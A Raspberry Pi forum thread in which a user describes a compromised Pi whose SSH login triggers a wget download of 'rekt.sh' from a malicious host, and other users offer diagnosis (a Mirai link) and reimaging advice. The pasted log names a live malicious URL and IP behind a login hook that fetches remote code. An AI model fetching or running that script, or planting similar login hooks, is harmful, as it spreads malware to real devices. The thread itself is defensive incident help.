wpmjones
Posts: 1
Joined: Sun May 14, 2017 3:07 pm

Is this a virus?

Sun May 14, 2017 3:24 pm

Yesterday, I noticed that my cron jobs weren't running. I opened crontab and found it to be blank. So I rebuilt it and figured it was a fluke. This morning, I couldn't SSH into it. So I rebooted and tried again. When I logged in, I experienced this.
Last login: Sun May 14 09:05:31 2017 from dal04631.hsd1.tx.comcast.net
converted 'http://kysfag.3x.ro//rekt.sh' (ANSI_X3.4-1968) -> 'http://kysfag.3x.r o//rekt.sh' (UTF-8)
--2017-05-14 10:03:50-- http://kysfag.3x.ro//rekt.sh
Resolving kysfag.3x.ro (kysfag.3x.ro)... 89.42.39.160
Connecting to kysfag.3x.ro (kysfag.3x.ro)|89.42.39.160|:80...
If I hit Ctrl-C during this process, it dumps to a tmp$ prompt. I can cd and get back to my regular folder and it seems everything is intact. If I let it finish, it boots me into what looks like a temp session without access to my regular files. I googled kysfag and rekt.sh without came up with nothing. I don't know how it happened, but it appears to be loading something when I log in through SSH (using PuTTY). Is there anyway to go in and tell it to stop loading things when I log in? I'm just not all that versed in Linux.

Thanks in advance!

lolhof
Posts: 1
Joined: Sun May 14, 2017 5:30 pm

Re: Is this a virus?

Sun May 14, 2017 5:36 pm

Hi wpmJones,

I have the same problem as you, did you figure out a solution already?

thegnnu
Posts: 155
Joined: Thu Oct 18, 2012 7:07 pm
Location: Bristol

Re: Is this a virus?

Sun May 14, 2017 5:43 pm

Cannot help you with the virus but start by going into your router and find the place to block the ip 89.42.39.160 this should keep that site out.
TerryR

jbudd
Posts: 294
Joined: Mon Dec 16, 2013 10:23 am

Re: Is this a virus?

Sun May 14, 2017 5:49 pm

According to scumware.org, the domain kysfag.3x.ro is assciated with the Linux trojan Mirai

http://thehackernews.com/2017/02/mirai- ... ndows.html

Ernst
Posts: 388
Joined: Sat Feb 04, 2017 9:39 am
Location: Germany

Re: Is this a virus?

Sun May 14, 2017 5:50 pm

This link gives some interesting information:
https://www.abuseipdb.com/check/89.42.39.160
where there are 3 reports with the subject keylogger.
My first computer was an ICT1500

mfa298
Posts: 972
Joined: Tue Apr 22, 2014 11:18 am

Re: Is this a virus?

Mon May 15, 2017 12:08 am

wpmjones wrote:Yesterday, I noticed that my cron jobs weren't running. I opened crontab and found it to be blank. So I rebuilt it and figured it was a fluke. This morning, I couldn't SSH into it. So I rebooted and tried again. When I logged in, I experienced this.
That certainly looks like a virus or other malware.

The easiest and safest course of action is to:
  • Turn off the pi
  • Disable any port forwarding on your router
  • Put an up to date image on a new SD card (assuming you want to recover data from the infected one)
  • Boot the clean image
  • Set a strong password for the Pi user (or better create a new user and delete the Pi user)
  • Install all updates (apt-get update, apt-get dist-upgrade)
  • Enable SSH if you need remote access
  • Enable port forwarding only if you need access externally (and consider not using port 22 for it)
  • Use an SD card reader to copy and data/scripts you need to keep (and check them before running)
You should potentially also consider anything else on the same network as compromised.

In most cases it's not worth the time trying to clean up an infected device. Without a lot of effort you won't know if you've found all the things someone might have modified or all the backdoors they might have installed.

runboy93
Posts: 302
Joined: Tue Feb 28, 2017 1:17 pm
Location: Finland

Re: Is this a virus?

Mon May 15, 2017 12:33 am

You forgot "apt-get upgrade" from install the updates :)
Aluminum case for Raspberry Pi 3
https://goo.gl/3QRuVw

RPi 3 tweaks by runboy93
https://goo.gl/o8grny

mfa298
Posts: 972
Joined: Tue Apr 22, 2014 11:18 am

Re: Is this a virus?

Mon May 15, 2017 12:43 am

runboy93 wrote:You forgot "apt-get upgrade" from install the updates :)
When using dist-upgrade running apt-get upgrade is a redundant step (dist-upgrade will do the same and sometimes a bit more)

update downloads the package metadata
upgrade will install newer versions of packages
dist-upgrade will install newer versions of packages and updated dependencies (i.e. if new packages are also required)

Most of the time the packages installed by upgrade and dist-upgrade will be the same, but there are occasional times where upgrade will hold a package back as the update needs a new package to be installed.

User avatar
kusti8
Posts: 3441
Joined: Sat Dec 21, 2013 5:29 pm
Location: USA

Re: Is this a virus?

Mon May 15, 2017 12:44 am

runboy93 wrote:You forgot "apt-get upgrade" from install the updates :)
It is better to do dist-upgrade than upgrade. Upgrade keeps some packages back in special cases, while dist-upgrade upgrades everything so that all versions are the latest and stay consistent.
There are 10 types of people: those who understand binary and those who don't.

Return to “Troubleshooting”

Who is online

Users browsing this forum: No registered users and 48 guests